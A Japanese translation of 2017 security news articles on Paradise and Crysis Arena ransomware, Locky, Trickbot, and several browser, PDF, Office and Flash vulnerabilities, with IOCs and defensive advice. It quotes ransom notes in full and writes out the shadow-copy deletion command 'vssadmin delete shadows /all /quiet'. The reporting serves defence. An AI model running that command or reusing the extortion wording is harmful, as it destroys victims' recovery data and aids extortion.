     Paradise身代金要求型マルウェアはRansomware as a Service (RaaS)であるかのように見える。RaaSは、身代金要求型マルウェアの開発者が身代金要求型マルウェアを作成し、その開発を管理し、犠牲者によって支払われた全身代金の一部と引き換えにCommand and Control(C&C、コマンドアンドコントロール)サーバを運用するものである。支払われた身代金の残りを得る提携者の仕事は、彼らが適切とする身代金要求型マルウェアをディストリバイトすることである。
     現時点で、以下が、このRaaSに関連するeMailである。

    tankpolice@aolonline.top
    edinstveniy_decoder@aol.com
    info@decrypt.ws

    Paradise身代金要求型マルウェアは、どのようにコンピュータを暗号化するのか

     現時点で、Paradiseがコンピュータに感染する方法は未知であるが、感染したコンピュータのイベントログから、ハッキングされたリモートデスクトップサービス経由の可能性がある。けれども、一旦実行されると、Paradiseは、管理者特権を取得するためにそれ自体を再起動し、次に、一意のRSA-1024キーを生成する。このキーは、そのコンピュータ上の各ドライブにあるファイルの全てを暗号化するために使用される。
     ファイルを暗号化すると、id-[affiliate_id].[affiliate_email].paradise文字列を暗号化したファイル名に追加する。例えば、test.jpgという名前のファイルが暗号化されるとtest.jpgid-3VwVCmhU.[info@decrypt.ws].paradiseになるだろう。


    Paradiseで暗号化されたフォルダ

     Paradiseはファイルの暗号化にRSA暗号化を使用するので、暗号化プロセスは非常に緩慢である。これは希望的には、暗号化が実行されている生け贄になっている時間を検出し、その停止を可能にする。
     この身代金要求型マルウェアはコンピュータの暗号化を終了すると、#DECRYPT MY FILES#.txtと名付けられた脅迫文を、ファイルが暗号化されたフォルダ中に投下する。この脅迫文は、提携先のeMailアドレスと、支払いの実行方法の指示を含んでいる。


    Paradise身代金要求型マルウェアの脅迫文

     Paradiseは次に、Base64でエンコードされた壁紙画像を抽出し、それをdesk.bmpとして%Temp%フォルダに保存する。この身代金要求型マルウェアは次に、この画像を犠牲者のデスクトップ背景画像として設定する。


    Paradise身代金要求型マルウェアのデスクトップ背景画像

     最終的に、この身代金要求型マルウェアは犠牲者のファイルを暗号化するために使用したRSA暗号化キーを%UserProfile%\DecriptionInfo.authファイルに書き込む。このファイルは次に、この身代金要求型マルウェア実行ファイルに同梱されているマスター暗号化キーによって暗号化される。これは、犠牲者が身代金を支払った後に、犠牲者に一意のRSAキーを、この開発者が抽出することを可能にするためである。

    IOCs

    Hashes:
    SHA256: 82cfb70e00f357065b68861e71f04b0af33d77fb63e72997b81c3c0402bf5c80

    Paradise身代金要求型マルウェア関連ファイル:
    #DECRYPT MY FILES#.txt
    %UserProfile%\Desktop\DecriptionInfo.auth
    %UserProfile%\AppData\Local\Temp\desk.bmp
    %UserProfile%\Failed.txt
    %UserProfile%\Files.txt

    Paradise身代金要求型マルウェアNote Text:

    [WHAT HAPPENED]

    Your important files produced on this computer have been encrypted due a security problem
    If you want to restore them, write us to the e-mail: info@decrypt.ws
    You have to pay for decryption in Bitcoins. The price depends on how fast you write to us.
    After payment we will send you the decryption tool that will decrypt all your files.

    [FREE DECRYPTION AS GUARANTEE]

    Before paying you can send to us up to 3 files for free decryption.
    Please note that files must NOT contain valuable information
    and their total size must be less than 1Mb

    [HOW TO OBTAIN BITCOINS]

    The easiest way to buy bitcoin is LocalBitcoins site.
    You have to register, click Buy bitcoins and select the seller by payment method and price
    https://localbitcoins.com/buy_bitcoins

    [ATTENTION]

    Do not rename encrypted files
    Do not try to decrypt your data using third party software, it may cause permanent data loss
    If you not write on e-mail in 36 hours - your key has been deleted and you cant decrypt your files

    関連Email:

    tankpolice@aolonline.top
    edinstveniy_decoder@aol.com
    info@decrypt.ws


    MicrosoftはEdgeブラウザのコンテンツ・セキュリティ・バイパスの脆弱性をパッチしない
    The Register : Security (2017/09/07)
     Google, Apple, Microsoftのどれが、コンテンツ・セキュリティ・バイパスは、ブラウザへのパッチを必要としないと考えているのだろうか?
     今迄のChromeとSafariと現在のEdgeのバージョンに影響を与えるクロスサイト・スクリプティングのバグを発見したCisco Talosのセキュリティの仲間Nicolai Grodum(oは、oに/)のおかげで、我々は、その答えがMicrosoftであることを知った。
     Grodumは、あなたが、Chrome 57.0.2987.98及び、それ以降を使用している場合は、CVE-2017-5033に関しては既に保護されているとする説明付きで、コチラにMicrosoftの対応のニュースを投稿している。iOS 10.3より後のDittoユーザと、10.1より後のSafariユーザは、CVE-2017-2419の損害を無しで済ませられる。しかしながら、Tarosは、「Microsoftは、これは設計によるものであり、この問題をパッチしないと宣言した」と記述している。
     このバグは、ブラウザが攻撃者に以下を可能にする方法でabout:blankの取り扱いを誤ることにある。

    ・ インライン・スクリプト・コード("unsafe-inline"命令)を可能にするためにContent-Security-Policy(CSP)を設定する。
    ・ 新しいブランク・ウィンドウを開くためにwindow.open()を使用し、
    ・ ブランク・ウィンドウ・オブジェクトにコードを書き込むためにdocument.writeをコールする(CSP制限をバイパスする方法で)。

     悪用されると、攻撃者は、他のサイトにコンタクトするためにJavaScriptを使用することができる。そして。それはロードされたドキュメントと同一の生成元を持っているので、CSPに制限されることなく動作する。
     Tarosの説明として、CSPの仕様は、「制限は継承されなければならない」(生成元のページに適用されているあらゆる制限は、それから開かれたページに適用されなければならない)ことは明らかである。


    Windows Kernel中のバグはセキュリティソフトがマルウェアを同定することを妨げている
    BleepingComputer : News>Security (2017/09/07)
     マルウェア開発者は、悪意あるモジュールがランタイムにロードされた時、あるいは、ロードされた場合に、セキュリティソフトウェアの同定を妨げるためにWindows Kernel中のプログラミングエラーを乱用することができる。
     このバグはPsSetLoadImageNotifyRoutine(幾つかのセキュリティ・ソリューションが、コードがカーネルもしくはユーザスペースにロードされた時に、同定するために使用しているローレベル(【訳注】 Windowsシステムに最も近い層)・メカニズムの一つ)に影響を与える。
     この問題は、攻撃者がPsSetLoadImageNotifyRoutineが不正なモジュール名を戻してくる方法中にあるこのバグ(正当なオペレーションとしてマルウェアを装うことを攻撃者に可能にする)を悪用することができることにある。

    このバグは過去17年間にリリースされた全てのWindowsバージョンに影響する

     この問題は、enSilo社(【訳注】 サンフランシスコを本拠とするサイバーセキュリティ企業)の研究者が、Windows Kernelのコードを解析していた今年初めに光を当てられていた。Omri Misgav(enSiloの研究者で、この問題の発見者の一人)は、このバグがWindows 2000以降リリースされた全てのWindowsのバージョンに影響を与えると発言している。
     Misgavのテストは、このプログラムエラーが、最新のWindows 10のリリースにも生き残っていることを示している。
     Microsoftは、新しく登録されたドライバをアプリケーション開発者に、プログラム的に通知する方法としてPsSetLoadImageNotifyRoutine通知メカニズムを導入した。このシステムはPE(Portable Executableファイル・フォーマット)画像が、仮想メモリにロードされた時にも検出ができるので、このメカニズムは、悪意あるオペレーションの幾つかのタイプを検出するための方法としてアンチウィルス・ソフトウェアにも統合された。

    Microsoftは、これをセキュリティ問題として見做していなかった

     今まさに、この大問題は、セキュリティソフトウェアが悪意あるオペレーションの幾つかのタイプを検出するために、この方法に依存しているということにある。
     「我々は特に如何なるセキュリティソフトもテストしていない。我々は、幾つかのベンダが、このメカニズムを使用していることに気が付いているが、現段階では、バグのある[PsSetLoadImageNotifyRoutine]情報を使用した場合、あるいは、使用方法が、それらに影響を与えるか否か発言できない」と、MisgavはBleeping ComputerへのeMail中で発言している。
     「我々は、今年初めに、この問題に関してMSRC(Microsoft Security Response Center)にコンタクトした」と「彼らはセキュリティ問題として判断しなかった」と、MisgavはBleeping Computerに告げている。
     「幾つかのオンライン・リファレンスは、このバグが多少知られていたことを示しているが、我々が理解している限り、この問題の根源と完全な意味合いは、今迄詳細に説明されていない」と、この研究者は発言している。
     技術的な詳細に関しては、enSiloのブログポストが、PsSetLoadImageNotifyRoutineの動作方法と、このバグが標準(想定されている挙動)を変更する方法の細部を詳細に説明している。


    6年前の"loop bug"は、殆ど全てのメジャーなPDFビューアに影響を与えることが再発見された
    BleepingComputer : News>Security (2017/09/04)
     2011年に遡って世間ではあまり知られていないPDFパーサー ライブラリ中に発見されたバグは、今日最先端の大部分のPDFビューア中にも存在していると、ドイツのソフトウェア開発者Hanno Bock(Bockは、oにウムラウト)が伝えている。
     このオリジナルのバグは、Evince(Linux用のドキュメントビューア)を含むPDFパーサー コンポーネントに影響を与えた。このオリジナルのバグは、ドイツのソフトウェア開発者Andreas Bogk(Evinceを支援し、このフローを修正した者)によって発見され、2011年のChaos Communication Campで彼の発見は提示された。
     Bogkは、特定の構造(PDF files cross-referencing internal xref tables)が、ローカルCPUリソースの全てを奪い無限ループをEvinceアプリケーションに発生させ、素早くメモリを食い尽くし、Evinceアプリケーションをクラッシュさせることを発見した。
     このバグは、メジャーなセキュリティ問題と考えられることなく、Linuxデスクトップ上にインストールされた小さなアプリケーションだけが影響を受けると考えられ、殆ど無視されていた。

    6年前のバグは、一般的なPDFビューア中に再浮上した

     6年後、この問題は、Bockが多くの著名なPDFビューア中に類似の挙動を発見した後、大問題となった。
     例えば、Bockは、PDFium(Chromeが、あらゆるプラグイン無しで、ブラウザ内部にPDFドキュメントをレンダリングすることを可能にしているライブラリ)中にBogkの"loop"バグを発見した。
     pdf.jsライブラリ(Firefoxで類似機能のために使用される)もまた、影響を受ける。pdf.jsは、ユーザがPDFファイルをダウンロードし、サードパーティのアプリケーション内部にそれを表示する必要なく、Webサイトのインターフェース内部で、PDFドキュメントをレンダリングするためにGitHubでも使用されている。GitHubの実装もまた、そのサイト上でのPDFの表示を破壊し無限ループになる脆弱性が存在している。
     Windows Runtime PDF Renderer(WinRT PDF)もまた、影響を受ける。これはEdgeに組み込まれているPDFビューアであるが、また、Windowsの"Reader App"、Windows 8と全後継バージョンのDefault PDFビューアに関するDefault PDFパーサーでもある。
     GhostscriptQPDFのような類似のオープンソースPDFパーサーもまた影響を受ける。これは、この問題が十中八九これら二つのプロジェクトを配備している多くの他のWebとデスクトップPDFビューアに流れ落ちることを意味している。
     Bockは、影響を受ける全ての製品にこの古いバグを通知した。そして、彼らは今、パッチを当てる準備をしている。

    Adobe Readerは影響を受けない

      Adobe ReaderとApple OS X組み込みのPDFビューアは影響を受けない。
     この研究者は、彼が各プロジェクトを解析するためにファジング ライブラリを使用したと発言している。ファジングは、プログラムのアウトプット・レスポンスの例外を解析するために大量のランダムなインプット・データを与える基本的セキュリティ・テスト・テクニックである。Googleのセキュリティ・エキスパートは、ファジングの大ファンであり、彼らのアドバイスを聞くことに興味のあるあらゆる者に、このテクニックを推奨していた。
     Bockはまた、アップデートされたテスト・スーツを実行していないことに関して、影響を受けるプロジェクトの管理者を非難している。テスト・スーツは、PDFビューアがクラッシュすることなく開くことができなければならない疑わしいファイルのコレクションである。理想世界では、ソフトウェア開発者は、テスト・スーツを成功裡に通り抜けることなく、彼らのアプリケーションの新しいバージョンをリリースすべきではない。Bockは、彼らのテスト・ケースにBogkの"loop bug"デモファイルを追加するように推奨している


    巨大なLocky身代金要求型マルウェア キャンペーンは、24時間に2300万のeMailを送信していた
    GrahamCluley : Blog (2017/09/01)
     セキュリティ研究者は、24時間にLockyマルウェアを積んだ2300万のメッセージを送信した巨大マルウェアキャンペーンを注目していた。
     AppRiverのセキュリティ エキスパートは、8月28日米国東部時間07:00(日本時間 8月28日 22:00)にこのキャンペーンを検出した。このキャンペーンの攻撃eMailの内容は僅かであった。"download it here"の要求と共に"pictures" や "documents"のような無害のように見える件名程度である。


    AppRiverによって注目されたLocky攻撃eMailの一つ

     言うまでもなく、この添付ファイルを開くことにした受信者にとって良いことは何も発生しない。AppRiverのTroy Gillは、以下の点を明らかにしている

     「各メッセージは二つ目のZIPファイルを内部にネスト(入れ子)しているVisual Basic Script (VBS)ファイルを含むZIP添付ファイルを搭載している。クリックすると、VBSファイルは、最新のLocky身代金要求型マルウェアをダウンロードするためにgreatesthits[dot]mygoldmusic[dotcom]にアクセスするダウンローダを初期化する。Lockyは、ターゲット・システム上のファイルの全てを暗号化し、そのユーザの暗号化されたファイルに[.]lukitus拡張子を追加する。」

     暗号化のルーティーンが終了すると、Lockyは、.onionポータルにリンクした脅迫文を表示した。このサイトを訪問した犠牲者は、Locky Decryptorとして知られる「特別なソフトウェア」と引き換えに 0.5Bitcoin(凡そ 2,413.50 USD、24万円ほど)を支払うように求める脅迫文を見ることになる。


    Lockyマルウェア キャンペーンの .onionポータル

     このキャンペーン(最近の記憶の中では、Locky搭載eMailの突然の急増は、これだけではない)は、3時間の間に560万を超えるeMailが計測された。その総数は、翌日にまたがり、2300万を越える攻撃メッセージに跳ね上がった。
    Lockyには、姿を消し、そして何処からともなく現れるチョットした歴史がある。
     間違いなく、我々は、Lockyを真似て独自の株を作成する犯罪者は言うまでもなく、様々な寿命の身代金要求型マルウェアの脅威のを見るだろう。そうは言うものの、ユーザは今行動し、頑健なデータバックアップ計画を今策定し....、遅くなってしまう前に。
     彼らが身代金要求型マルウェアに攻撃された場合に、彼らが復元努力するために使用することのできる幾つかのヒントが此処にある。


    別のバンキング・トロイが、あなたの仮想通貨ウォレット(財布)を略奪しようとしている
    The Register : Security (2017/08/30)
     研究者達は、従来の口座の代わりに仮想通貨ウォレットを標的にするバンキング・トロイの新しい変種を発見した。
     Coinbase(最新のTrickbot変種のターゲットの一つである仮想通貨交換サイト)は、複数の仮想通貨を管理しているが、結果として、サイバー犯罪者が、そのアカウント証明を収穫することに成功した場合には、彼らが、乱用するための広汎なプラットフォームを提供することになっていた。情報セキュリティ企業Forcepoint Securityは、標的として、このトロイ(すでに、世界中の多くのプロバイダーの銀行口座を略奪しようとしている)に関する設定ファイルにCoinbaseを追加したと、レポートしている。
     サイバー犯罪者達は、作成以来、Trickbotを開発し続けており、その攻撃リストに新しい地方銀行(最も新しいところでは北欧)を追加し続けている。セキュリティ研究者達は最近、PayPalウォレットを標的にしたTrickbotキャンペーンを暴いている。
     デジタル通貨口座への切り替えは、Bitcoinや同類の支払い形式への人気に一致している。
     マルウェアを拡散しようとする怪しいメッセージは、Canadian Imperial Bank of Commerce(CIBC、カナダ帝国商業銀行)からの「安全なメッセージ」を装っている。ブービートラップされている添付ファイルは、最終的にTrickbotの変種をダウンロードし実行するマクロ・ダウンローダを匿っている。
     仮想通貨ウォレットを標的にしたマルウェアは珍しいが、前例がないわけではない。例えば、Dridexバンキング・トロイの変種は、昨年このルートを通った。2011年6月に遡るが、F-SecureはBitcoin WALLET.DATを検索するトロイを捕獲している。


    Arena Crysis身代金要求型マルウェアの新しい変種がリリースされた
    BleepingComputer : News>Security (2017/08/25)
     昨日、ID-RansomwareのMichael Gillespieは、暗号化したファイルに .arena 拡張子を追加するCrysis/Dharma身代金要求型マルウェアの新しい変種を発見した。この変種がどのように拡散しているのか正確には知られていないが、今まで、Crysisは、一般的にはRemote Desktop Services中に不正に侵入することで拡散してきた。
     この身代金要求型マルウェアがインストールされると、このマルウェアは特定のファイルタイプに関してそのコンピュータをスキャンし、それらを暗号化する。ファイルを暗号化すると、.id-[id].[email].arena の形式で拡張子を追加する。例えば、test.jpgと名付けられているファイルが暗号化されると、test.jpg.id-BCBEF350.[chivas@aolonline.top].arena にリネームされる。
     この身代金要求型マルウェアが、マップされているネットワークドライブと、アンマップ・ネットワーク共有を暗号化することに注意しておかなければならない。そこで、必ずあなたのネットワーク共有をロックしておき、実際にアクセスする必要のある人だけがパーミッションを持つようにしておくことが重要である。
     以下に、暗号化されたフォルダの例を示す。


    Crysis Arena身代金要求型マルウェアの変種で暗号化されたファイル

     コンピュータが暗号化されると、このマルウェアは、シャドウ・ボリューム・コピーの全てを削除するので、あなたはファイルの復元にシャドウ・ボリューム・コピーを使用することはできない。このマルウェアは、vssadmin delete shadows /all /quiet コマンドを実行することでシャドウ・ボリューム・コピーを削除する。
     Arena Crysis変種はまた、二つの脅迫文を作成する。一つは、info.hta ファイルであり、このファイルはautorunによって実行される。


    Crysis Arenaの脅迫文(クリックすると画像は拡大されます)

     もう一つの脅迫文は、FILES ENCRYPTED.txtと名付けられている。


    FILES Encrypted脅迫文

     これら二つの脅迫文は、支払いの指示を与えるために chivas@aolonline.top にコンタクトするための指示を含んでいる。
     最終的に、この身代金要求型マルウェアは、あなたがWindowsにログインした時、自動的に開始するように、それ自体を設定している。これはまた、最後に実行された後に作成された新しいファイルを、暗号化することも可能にしている。

    Crysis Arena身代金要求型マルウェアの変種で暗号化されたファイルを復号することは不可能

     残念ながら、この時点で、 Crysis身代金要求型マルウェアで暗号化された .arena ファイルを無料で復号することは不可能である。
     暗号化されたファイルを複合する唯一の方法は、バックアップからである。あるいは、あなたが恐ろしいまでに幸運であるのなら、シャドー・ボリューム・コピーからである。Crysisはシャドー・ボリューム・コピーを削除しようとするが、身代金要求型マルウェア感染は、稀に、何らかの理由から、これを実行することに失敗する場合がある。それ故、実行可能なバックアップを持っていない場合には、私は常に最後の手段としてシャドー・ボリューム・コピーから暗号化されたファイルの復元を試みるよう人々に提案している。
     Crysis身代金要求型マルウェアを論議したい、あるいはサポートを必要としている人々に関しては、我々の専用のCrysis Ransomware Help & Support Topicを使用することができる。

    Crysis身代金要求型マルウェアから自分自身を守るための方法

     Crysisから、あるいは、あらゆる身代金要求型マルウェアから自分自身を保護するためには、適切なコンピューター操作の習慣とセキュリティソフトウェアを使用することが重要である。何よりもまず、緊急の事態(身代金要求型マルウェア攻撃のような)に際して復元可能な、あなたのデータの信頼あるテスト済みのバックアップを常に持つようにすることである。
     あなたはまた、Emsisoft Anti-MalwareMalwarebytesのような挙動検知を含むセキュリティ ソフトウェアを持たなければならない。
     大事なことを言い忘れていたが、必ず、以下の適切なオンラインセキュリティ習慣を実践しなさい。これは多くの場合において、あらゆるものの中で最も重要なステップである。

    ・ バックアップ、バックアップ、バックアップ
    ・ 誰が送信したのかわからない場合、添付ファイルを開かないようにしなさい
    ・ その人が実際にあなたにそれらを送信したことを確認するまで添付ファイルを開かないようにしなさい
    ・ VirusTotalのようなツールで添付ファイルをスキャンしなさい
    ・ リリースされたら直ぐに、必ず全てのWindowsアップデートをインストールしなさい。また、全てのプログラム(特に、Java, Flash, Adobe Reader)を必ずアップデートしなさい。古いプログラムは、マルウェアの配布者によって一般的に悪用されているセキュリティ上の脆弱性を含んでいる。それ故、それらのプログラムをアップデートし続けることは重要である
    ・ 或る種のセキュリティソフトウェアをインストールし使用していることを確実にしなさい
    ・ 強力なパスワードを使用し、複数のサイトで同じパスワードを決して再使用しないようにしなさい
    ・ リモートデスクトップサービスを使用しているのなら、それを直接インターネットに接続しないようにしなさい。代わりに、VPNを介してだけそれにアクセスするようにしなさい

     身代金要求型マルウェア防御に関する完全ガイドに関しては、我々のHow to Protect and Harden a Computer against Ransomwareの記事を訪問しなさい。

    IOCs

    Hash
    ARENA SHA256: a683494fc0d017fd3b4638f8b84caaaac145cc28bc211bd7361723368b4bb21e

    Arena Crysis身代金要求型マルウェアのFILES ENCRYPTED.TXT脅迫文
    all your data has been locked us
    You want to return?
    write email chivas@aolonline.top

    Arena Crysis身代金要求型マルウェアのINFO.hta脅迫文
    All your files have been encrypted!
    All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail chivas@aolonline.top
    Write this ID in the title of your message [id]
    In case of no answer in 24 hours write us to theese e-mails:chivas@aolonline.top
    You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.
    Free decryption as guarantee
    Before paying you can send us up to 5 files for free decryption. The total size of files must be less than 10Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)
    How to obtain Bitcoins
    The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.
    https://localbitcoins.com/buy_bitcoins
    Also you can find other places to buy Bitcoins and beginners guide here:
    http://www.coindesk.com/information/how-can-i-buy-bitcoins/
    Attention!
    Do not rename encrypted files.
    Do not try to decrypt your data using third party software, it may cause permanent data loss.
    Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.


    FoxitがPDFリーダーをパッチすることを拒否した後、二つの0-Dayの脆弱性が明らかにされた
    GrahamCluley : Blog (2017/08/21)
     研究者達は、FoxitのPDF Readerのベンダが、そのセキュリティフローを修正する計画がないことを明らかにした後、Foxit PDF Readerに影響を与える二つの0-Dayを明らかにした。
     8月17日、責任ある公開(responsible disclosure)プログラムZero Day Initiative (ZDI)は、この研究者達が、Foxitの無料のPDF Reader中に発見したバグの公開に踏み切った。
     一つ目の脆弱性(CVE-2017-10951)は、このソフトウェアのapp.launchURLメソッドがシステムコールを実行する前に、ユーザによって提供された文字列を適切に認証していないことによるものである。
     Foxit PDF Readerの二つ目のバグ(CVE-2017-10952)は、ユーザ提供データの不適切な認証に起因しているが、それどころか、saveAs JavaScript関数に影響を与えている。
     上手く悪用されると、このフローのどちらも、リモート攻撃者が任意のコードを実行することを可能にする。
     ZDIのAriele Caltabianoは、2017年5月中旬に、この一つ目のフローを発見し、Offensive SecurityのSteven Seeleyは、6月の末近くに二つ目のバグを発見した。
     この二人の研究者は、120日の責任ある公開タイムラインに従い、その後直ぐにこの問題についてFoxitに接触した。しかし、彼らは、Foxitがこのバグを修正する意思がないことが明らかになった後まもなく、このフローを公開することを最終的に決定した。
     このベンダは、AusCERTに提供したステートメントで以下のように発言している。

     「Foxit ReaderとPhantomPDFは、JavaScriptの実行を制御するためにDefaultで有効になっているSafe Readingモードを持っている。そして、この機能は、認証されていないJavaScriptアクションが狙う潜在的な脆弱性を効果的に防御する」

     それはいいのだが、我々の多くは、毒性ペイロードの実行を可能にするために騙されて安全機能を無効化している世間知らずのユーザを見てきており、このような攻撃を嫌というほど知っている。
    Foxitは、真面目に、そして、適切に変更するように、その製品の安全対策を講じるためにデモされているパッチを使用することもできた。Foxit Readerユーザになろうとしたことがある人への、取り分け、過去のAdobeの脆弱性から逃走している間に、このソフトウェアを採用した人々に対して、何という歓迎の挨拶だ。
     FoxitをSafe Readingモードで実行していないユーザーにとっては、これは最初からのやり直しになると、私は推測している。
     他の非Adobe PDF Readerの一部に関しては、TechRadarのリストをチェックしなさい。あなたが、これらのオプションの一つを選ぶことを決定したのなら、必ず独自の調査をしなさい。その製品が適切なセキュリティ・レコードを持っており、あなたの必要性を満足させることを確認する前に、いかなるものもダウロードしてはならない。


    8つのChrome拡張がハイジャックされ、480万ユーザに悪意あるコードを配布していた
    BleepingComputer : News>Security (2017/08/16)
     昨日Proofpointの研究者Kafeineが明るみに出した新たな証拠によると、6人以上の開発者が、ここ4ヶ月間で彼らのChrome拡張をハイジャックされていた。
     今月初め、我々は、CopyfishWeb Developerと名付けられている二つのChrome拡張がハイジャックされていることについてレポートした。この二つの場合、攻撃者は開発者を欺くためにフィッシングeMailを使用し、開発者達のChromeアカウントのログイン認証を手にしていた。

    6つものChrome拡張がハイジャックされていた

     昨日、巧みな追跡の後、セキュリティ研究者Kafeineは、同じ手口でハイジャックされていた6つものChrome拡張を同定した。このリストは以下を含んでいる。

     8つの拡張全てに関する全インストール数を加算すると、攻撃者達は凡そ480万ユーザに彼らの悪意あるコードの配布を何とか達成していた。
     更に、Bleeping Computerはまた、二つの他のChrome拡張のオーナーに対する幾つかのフィッシング攻撃と、Chrome拡張開発者に対しフィッシング詐欺に目を光らせるように警告するeMailセキュリティ・アラートがGoogleによって送信されたことをレポートしている。
     全ての攻撃において、フィッシングがハイジャックプロセスの第一段階であるために、Googleは二週間前にeMailアラートを送信していた。このプロセスは継続し、その拡張のソースコード・レポジトリを乗っ取り、悪意あるコードを追加し、この拡張を再パッケージし、悪意あるコードを含むアップデートを押し付けていた。

    攻撃者は広告を置き換える(侵入型ポップアップ)ことに集中していた

     当初、このコードの解析は、大雑把なものであったが、我々は今、詳細な解析を持つことになった。幾つかのハイジャックされた拡張中に発見された悪意あるコードに関するKafeineの解析に感謝する。
     このProofpointの研究者によると、これらの拡張中に追加された悪意あるコードは、以下の操作を実行するために特別に細工されていた。

    ― ハイジャックされた拡張がインストールもしくはアップデートされた後、少なくとも10分待機する。
    ― ランダムにDGA(Domain Generation Algorithm。接続先ドメイン名生成)で生成されたドメイン(【訳注】 接続先ドメイン名生成の仕組みを利用して機械的に生成されたドメイン名で用意されたC&Cサーバ)からJavaScriptファイルを取得する。
    ― このユーザのブラウザからCloudflare(【訳注】 コンテンツデリバリーネットワークや分散型ドメイン名サーバシステムを提供するアメリカ合衆国の企業で、ウェブサイトにリバースプロキシを動作させることで閲覧者と自社ユーザーのホスティングプロバイダー間を取り持っている(Wikipediaより))認証を収穫する。
    ― 合法的サイト上の広告を、このハイジャッカーによって提供される広告に置き換える。
    ― 殆どの置き換え広告は、アダルトポータルサイトであり、33の正確なバナーサイズで行われている。
    ― エラーに関するユーザへの警告ポップアップを表示し、彼らを、トラフィック リダイレクト アフィリエイト プログラムの新しいWebサイトにリダイレクトする。

    攻撃者は2016年6月以来攻勢をかけている

     これら全ての行動は、攻撃者に少額の利益を得させていた。このフィッシングとハイジャック攻撃は、2017年5月に開始されたが、Kafeineは、2016年6月に遡り、クッキー同意型スクリプトを介して悪意あるコードの配布を発見された悪意あるChrome拡張に対してこれら複雑な操作に使用された基礎構造の一部をリンクした。
     これは、これらの攻撃の背後にいる実働部隊が、Chrome拡張とChrome Web Storeの両方の内部構造を熟知しており、ここ数週間で公になったにも拘わらず、十中八九彼らの作戦を継続することを示している。
     これらのChrome拡張のハイジャックが同じグループであるとする明確な証明はないが、これは単なる偶然の一致とすることはできない。上述の攻撃の全てが、同じグループもしくは個人により実行されたとする高い蓋然性は存在する。
     Kafeineによると、より悩ましいのは、このサイバー犯罪者がCloudflareの認証を収集したという事実である。そして、この研究者が確信していることは、攻撃者が将来の攻撃のための新しい方法と基礎構造を提供する可能性があるということである。


    Office脆弱性の悪用は、PowerPointのバリエーションとして新たな生命を得ている
    BleepingComputer : News>Security (2017/08/15)
     ここ数ヶ月に渡り、Officeの脆弱性は、脆弱性のあるコンピュータにマルウェアを拡散させるための最も人気のある効果的な方法の一つになっていた。
     この脆弱性(CVE-2017-0199として追跡される)は、今年4月にMcAfeeとFireEyeの従業員によって発見された。そして、これは発見された当初0-Dayの脆弱性であった。
     4月に、攻撃者は、彼らのターゲットにRTFファイル(このファイルが開かれると、OLE2linkオブジェクトを自動的に実行し、ユーザのマシンをセキュリティ侵害するために悪意あるコードを実行する)を配布するために、この脆弱性を使用した。。
     この時点で、攻撃者はHTAファイルをダウンロードし、次に、悪意あるJSコードを実行し、次に、様々なペイロードをインストールするために、このRTFファイルを使用した。研究者は、サイバースパイ・キャンペーンで、CVE-2017-0199がウクライナにおけるロシア支持の分離主義者を標的にするために使用されたことを確認しているが、平凡な金融マルウェア・キャンペーンでLatentbotバックドア トロイが配布されていたことも確認している。
     その後、この同じ脆弱性の悪用は、フィッシング用の悪意あるDOCファイルをスパムeMailすることでCerber身代金要求型マルウェアを配布するためにも使用された。

    攻撃者はCVE-2017-0199を使用し、無残にも失敗している

     昨日、CiscoとTrend Microは、サイバー犯罪者の間で、その人気を確認するために、この新しい脆弱性攻撃を使用している新たなキャンペーンに注目した。
     Ciscoによって注目されたこの攻撃は、CVE-2012-0158に2016年に最も人気のあった脆弱性であるCVE-2017-0199とを連結したグループによるものであった。
     Ciscoによると、このグループは、マルウェアをインストールするためにHTAファイルをダウンロードするこれまで通りのRTFドキュメントを配布するスパムキャンペーンを実行している。
     サイバー犯罪者は、Ramnitバンキング・トロイもしくはLokibot infostealer(【訳注】 侵入先のコンピュータから機密情報を収集する有害なソフトウェア(シマンテック日本より))の何れかを拡散させようとしていた。Ciscoの専門家は、ユーザに感染しようとする殆どの企ては失敗したと発言している。これは、ユーザのコンピュータが二つの脆弱性の何れもがパッチされていた場合、この感染の企ては失敗するからである。
     「この攻撃は失敗に終わった、これは、この攻撃者によるテストや品質管理手順が潜在的に貧弱であったことを示している」と、Cisco Talosチームは発言している。

    攻撃者はCVE-2017-0199を工夫して使っている

     CVE-2017-0199のこれらの新しい攻撃の最初の段階は、貧弱な実装であった。この第二段階は非常に創造的であった。そして、マルウェア開発者達は、このOfficeのフローを悪用する新たな方法を考えだした。
     Trend Microによって着目されたこれらの新しい攻撃は、同じCVE-2017-0199脆弱性を悪用していたが、RTFの代わりにPowerPoint PPTXファイルを介していた。攻撃者は、他のDOCファイルをダウンロードし、それを開き、Remcos RATをインストールするためにPPTXファイルを使用する。
     大多数の攻撃は、電子機器製造業関連企業を標的にしている。これは、この攻撃が、或る種の経済的なスパイ活動の一環であることを示唆している。
     「CVE-2017-0199用の殆どの検出方法は、RTFでの攻撃方法に着目しているので、新しい攻撃ベクトルの使用(PPSXファイル)は、攻撃者がアンチウィルスの検出を回避することを可能にする」と、Trend Microは発言している。
     Cybereasonはまた、Remcos RAT感染の急上昇を確認している。この企業は、ユーザのコンピュータ上にファイルを作成する方法と、RemcosによるユーザのPCの乗っ取りを防御する方法に関するガイドを一緒に置いている。
     Microsoftは、2017年4月の定例アップデートの一部としてCVE-2017-0199用のセキュリティ アップデートを発行している。


    最近パッチされたFlashのバグはWindows資格情報をリークする可能性がある
    BleepingComputer : News>Security (2017/08/11)
     今週初め、Adobeは、攻撃者が悪意あるFlashファイルを使用してWindows資格情報をリークすることができるFlash Player中の脆弱性をパッチした。
     このセキュリティ問題は、識別子CVE-2017-3085で追跡され、 Windows XP, Vista, 7, 8.x, 10で実行されているバージョン23.0.0.162 から 26.0.0.137のFlash Playerに影響を与える。

    以前の脆弱性に由来するフロー

     この脆弱性は、オランダのセキュリティ研究者Ruytenbergによって発見され、そして、Adobeが2016年9月にパッチしたCVE-2016-4271として追跡されていた以前のフローのバリエーションである。
     その当時、Ruytenbergは、彼が犠牲者を欺いてリモートSMBサーバにコールバックするFlashファイルをロードし、ユーザのコンピュータを欺いてその資格情報を奪うことができることを発見していた。
